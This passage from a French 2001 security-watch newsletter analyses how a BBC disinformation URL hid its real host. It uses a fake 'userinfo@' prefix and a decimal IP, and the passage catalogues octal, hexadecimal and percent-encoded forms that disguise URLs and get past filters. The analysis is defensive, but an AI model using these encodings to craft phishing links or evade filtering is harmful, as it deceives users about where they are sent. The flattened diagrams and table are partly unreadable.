‘;’, ‘:’, ‘&’ , ‘=’, ‘+’, ‘$’, ’,’. # Le chemin (path) : cette composante, le plus souvent optionnelle permet de référencer la ressource indépendamment de la localisation (réseau) de celle-ci. # La requête (query) : initialement réservée aux paramètres de description de la requête, cette composante est désormais considérée comme un chaîne d’information destinée à être interprétée par la cible. Les syntaxes suivantes (présentée sous une forme simplifiée afin d’améliorer la lisibilité) sont donc parfaitement valides: & Définitions élémentaires du RFC1630: http :// [host[:port] afs :// [host[:port] wais :// [host[:port] ldap :// [host[:port] ftp :// [user[:password]@]host[:port] telnet :// [user[:password]@]host[:port] mailto :// name@host [/path] [?search] /path /database [?search] [/[dn[?[attrib][?[scope][?[filter][exts]]]]]] /path [ftptype] [?subject] & Extension générique du RFC2396: [userinfo@]host[:port] Ces premiers éléments permettent d’analyser l’adresse à la base de la campagne de désinformation de la BBC : http :// news.bbc.co.uk!articles@3276960428 /hi/english/uk/newsid/123456.htm # La chaîne ‘news.bbc.co.uk!articles@’ correspond au champ ‘userinfo@’ et non à l’adresse d’un site même si la forme et le contenu laisse supposer le contraire. La transmission de ces éléments au service distant dépendra de la méthode d’accès utilisée. En mode HTTP, ces éléments sont mémorisés par le navigateur, et ne sont transmis qu’à la demande explicite du serveur lorsque celui-ci requiert une authentification. # La chaîne ‘3276960428’ correspond au champ ‘host’ bien que sa forme soit inhabituelle car purement numérique. Le problème est maintenant d’analyser cette forme numérique et de vérifier sa conformité vis à vis des exigences mentionnées dans les deux RFC de référence. Ceux-ci spécifient deux formes: - Hostname: nom d’un système conforme au nommage DNS, c-à-d une succession de chaîne de caractères imprimables séparés par le caractère ‘.’ - Ipv4address: adresse IP sous la forme dite IP pointée, ou dotted IP, c-à-d quatre séries de chiffres décimaux compris entre 0 et 255 séparés par le caractère ‘.’ Il apparaît donc que la syntaxe utilisée n’étant pas spécifiée, celle-ci ne devrait pas fonctionner. Et pourtant, elle conduit les dernières versions de navigateurs ‘classiques’ – notamment Microsoft IE5.5 et Netscape 6.0 - à se connecter sur un site dont rien ne permet d’identifier le nom ou l’adresse au format IP pointé classique ! L’explication de ce comportement doit être recherchée dans la stratégie de traitement d’une URL dont certaines composantes peuvent être interprétées au niveau du navigateur, et sont en conséquence susceptibles de déroger aux règles édictées par les RFC. Les deux principaux types de traitement sont synthétisés sur les schémas suivants : 1. Mode ‘Normal’ : scheme :// autority path ? query les composantes permettant de localiser le site et la méthode d’accès sont GET path ? query scheme :// autority Site directement traitées par le navigateur. Navigateur 2. Mode ‘Proxy’ : GET scheme :// autority path ? query GET path ? query la totalité de l’URL est transmise en l’état vers un proxy scheme :// autority Site service intermédiaire, le proxy qui agit pour le Navigateur Proxy compte de l’utilisateur. En pratique, l’interprétation de la composante ‘autority’ par les navigateurs classiques est réalisée en considérant que toute chaîne ne respectant pas un format d’adresse IP pointée doit être interprétée comme un nom de système. Ce nom est ensuite traduit sous la forme d’une adresse IP en s’appuyant sur un service de résolution de nom. En environnement Windows, cette traduction est généralement assurée par la fonction universelle ‘InternetConnect’ présente dans la librairie dynamique ‘WinInet.dll’. Hélas, l’implémentation de cette fonction intègre un comportement non documenté consistant à interpréter toute chaîne numérique comme étant une adresse IP écrite au format décimal. Le lecteur pourra s’en convaincre en testant cette fonction au moyen d’un petit programme écrit en visual basic dérivé de celui proposé sur le site VbSquare. Notons à ce propos qu’un avis émis par Microsoft sous la référence MS98-016 ‘Dotless IP Address’ mettait en évidence ce comportement sans pour autant le corriger, le correctif fourni visant simplement à éviter que le navigateur ouvre le site dans un contexte de sécurité considéré comme local (celui d’un Intranet) ! Ces nouveaux éléments permettent de finaliser l’analyse de la composante ‘autority’ de l’URL précédente: http :// news.bbc.co.uk!articles@3276960428 /hi/english/uk/newsid/123456.htm # La chaîne ‘3276960428’ correspond au champ ‘host’ interprété comme contenant une adresse IP de 32bits Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 44/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 exprimée au format décimal : 3276960428 (décimal) -> C35272AC (hexadécimal 32bits) -> C3.52.72.AC (hexadécimal 4*8bits) -> 195.82.114.172 (décimal pointé) En résumé, l’utilisateur peu méfiant est persuadé se connecter sur le site ‘news.bbc.co.uk‘ et accéder à l’article ‘3276960428/hi/english/uk/newsid/123456.htm’ tout en étant dirigé sans le savoir sur une page référencée ‘hi/english/uk/newsid/123456.htm’ et localisé sur le site ayant pour adresse 195.82.114.172 Pour conclure, rappelons que les deux techniques de dissimulation présentées peuvent encore être améliorées par: 1. L’utilisation d’une base non décimale dans la composante ‘autority’ Toutes les formes suivantes sont ainsi valides et représentent la même adresse IP ! Adresse Dotted IP exprimée en base décimale: http://194.2.187.187 Adresse Dotted IP exprimée en base octale: http://0302.02.0273.0273 Adresse Dotted IP exprimée en base hexadécimale: http://0xC2.0x02.0xBB.0xBB Adresse numérique 32bits exprimée en base décimale: http://3254959035 Adresse numérique 32bits exprimée en base octale: http://030200535673 Adresse numérique 32bits exprimée en base hexadécimale: http://0xC202BBBB 2. L’utilisation du caractère d’échappement ‘%’ Tout caractère peut être transcodé au moyen du caractère d’échappement ‘%’ à l’exception des caractères du composant ‘scheme’. Précisons que l’échappement de l’un des caractères réservés (‘%’, ‘/’, ‘#’, ‘ ?’, ‘*’) lui fait perdre sa sémantique originale. Ainsi, le caractère ‘/’ n’a plus la signification de séparateur hiérarchique s’il est encodé en ‘%2F’. En pratique, les URL suivantes ne sont donc pas équivalentes : http://veille.apogee-com.fr/documents.d/Analyses/Attaques/index.html http://veille.apogee-com.fr/documents.d/Analyses/Attaques%2Findex.html Hormis ces exceptions, l’URL http://www.apogee-com.fr/index.htm peut ainsi être encodée en : Http://www.apogee-com.fr/%69%6E%64%65%78%2E%68%74%6D ou encore Http://www.apogee-com.fr/%69%6E%64%65%78.%68%74%6D ou une combinaison purement illisible telle Http://%77%77%77%2E%61%70%6F%67%65%65%2D%63%6F%6D%2E%66%72/%69%6E%64%65%78%2E%68%74%6D Le tableau suivant propose une synthèse de schémas d’encodage des différentes composantes d’une URL, encodages testés et considérés comme valide par les deux plus grands navigateurs en environnement Windows. Aucun test n’a été réalisé sur d’autres versions de navigateurs ou dans d’autres environnements d’exploitation. scheme :// userinfo@ host :port / path Le navigateur transmet X X X X X X X Le proxy transmet X X X X Sans Proxy Le navigateur transmet condition X X Formatage Libre oui oui Echappement ‘%’ autorisé autorisé autorisé autorisé Forme autorisée Caractères alpha autorisé autorisé autorisé Numérique autorisé autorisé autorisé autorisé Forme adresse Nom DNS (n.d.tld) X 4*8bits Décimal (a.b.c.d) X 4*8bits Octal (0a.0b.0c.0d) X 4*8bits Hexa (0xa.0xb.0xc.0xd) X 32bits Décimal (nnnnn) X 32bits Octal (0nnnn) X 32bits Hexa (0xnnnn) X Notons que la technique consistant à concaténer deux composantes ‘autority’ pour créer un relayage forcé – avec ou sans changement de protocole - n’a pas été abordée. Son utilisation permet non seulement de complexifier l’analyse de l’URL mais aussi de masquer l’origine d’une connexion ou encore de traverser certains filtres de protection. Cette rapide étude montre les problèmes induits par l’absence d’un véritable processus de normalisation ne laissant place ni à l’interprétation ni à la diffusion de produits non conformes. Elle démontre la difficulté de la mise en place d’un mécanisme de filtrage uniquement basé sur des règles de comparaison en lieu et place d’une analyse syntaxique utilisant une grammaire évolutive et adaptable à l’environnement. Avec Proxy # Complément d'information http://news.bbc.co.uk!articles@3276960428/hi/english/uk/newsid/123456.htm http://europe.thestandard.com/article/display/0,1151,16490,00.html Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 45/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE